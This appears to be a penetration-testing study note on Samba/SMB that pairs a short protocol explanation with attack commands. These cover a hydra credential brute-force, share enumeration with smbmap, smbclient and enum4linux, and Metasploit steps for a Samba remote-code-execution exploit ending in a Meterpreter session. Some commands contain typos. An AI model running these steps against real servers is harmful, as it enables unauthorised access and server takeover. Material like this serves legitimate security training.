SAMBA

SMB (Server Message Block) is a network file-sharing protocol that allows computers on a local network (LAN) to share files, printers, and other resources. It usually runs on TCP port 445, though older versions used port 139 with NetBIOS.

On Linux, SMB is implemented through Samba, which lets Windows systems access shared files and devices on Linux. Samba requires username and password authentication to access a server or network share.

Attackers can attempt a brute-force attack on a Samba server to obtain valid credentials. Once credentials are obtained, tools like SMBMap can be used to enumerate shared drives, list contents, download files, and execute remote commands on the target system.

Another useful tool is smbclient, which is part of the Samba software suite. It works like an FTP client, allowing users to download and upload files, retrieve directory information, and interact with the SMB server.

Techniques

nmap -sV [TARGET IP]

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/commomn_passwords.txt [TARGET IP] smb

smbmap -H [TARGET IP] -u [USER] -p [PASSWORD]

smblient -L [TARGET IP] -U [USER]
smblient //[TARGET IP]/[SHARE] -U [USER]

enum4linux -a [TARGET IP]
enum4linux -a -u [USERNAME] -p [PASSWORD] [TARGET IP]

Exploitation

Samba v3.5.0 has a remote code execution (RCE) vulnerability that allows an attacker to upload a malicious shared library to a writable share. Once uploaded, the attacker can make the server load and execute the harmful file, potentially gaining control of the server.

nmap -sS -sV -O [TARGET]

search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
show options
check

sessions
search shell_to_meterpreter
use multi/manage/shell_to_meterpreter